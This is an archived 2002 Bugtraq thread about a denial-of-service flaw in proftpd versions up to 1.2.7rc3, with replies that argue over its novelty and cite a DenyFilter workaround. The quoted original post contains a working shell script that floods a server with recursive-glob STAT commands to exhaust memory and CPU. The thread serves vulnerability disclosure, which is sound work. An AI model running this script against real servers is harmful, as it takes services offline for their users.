Bugtraq mailing list archives

Re: [VulnWatch] proftpd <=1.2.7rc3 DoS

From: Rob klein Gunnewiek <rmkleing () hio hen nl>
Date: Wed, 11 Dec 2002 01:15:01 +0100 (MET)

Hello,

1. I know that the workaround with the DenyFilter works.
2. Proftpd by default doesn't have this filter set, neither has the
   default proftpd install on slackware 8.1
3. The methods mentioned on the page you refer to do not work on later
   proftpd versions (tested on 1.2.7rc3) because of limits set in the
   code. i.e:

ftp> ls .*./*?/.*./*?/.*./*?/.*./*?/.*./
200 PORT command successful
150 Opening ASCII mode data connection for file list
226-Out of memory during globbing of .*./*?/.*./*?/.*./*?/.*./*?/.*./
226 Transfer complete.
ftp>

  these proftpd versions don't even process that command.

I think I have done proper research on this issue before notifying anyone.

People should do more research before making any conclusions, it's far
less embarassing.

Rob.

On Tue, 10 Dec 2002, Kurt Seifried wrote:

This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:

http://lwn.net/2001/0322/a/proftpd-dos.php3

Check the documentation:

DenyFilter \*.*/

Problem solved.

People should search Google before posting, it's far less embaressing.

Kurt Seifried, kurt () seifried org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

----- Original Message -----
From: "Rob klein Gunnewiek" <rmkleing () hio hen nl>
To: <bugtraq () securityfocus com>; <vulnwatch () vulnwatch org>
Sent: Sunday, December 08, 2002 4:53 AM
Subject: [VulnWatch] proftpd <=1.2.7rc3 DoS

Hello,

proftpd is vulnerable to denial of service similar to the list
*/../*/../*/../*.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end

Current thread:

proftpd <=1.2.7rc3 DoS Rob klein Gunnewiek (Dec 11)
- Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Kurt Seifried (Dec 10)
  - Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Rob klein Gunnewiek (Dec 11)
    - Re: [VulnWatch] proftpd <=1.2.7rc3 DoS Kurt Seifried (Dec 12)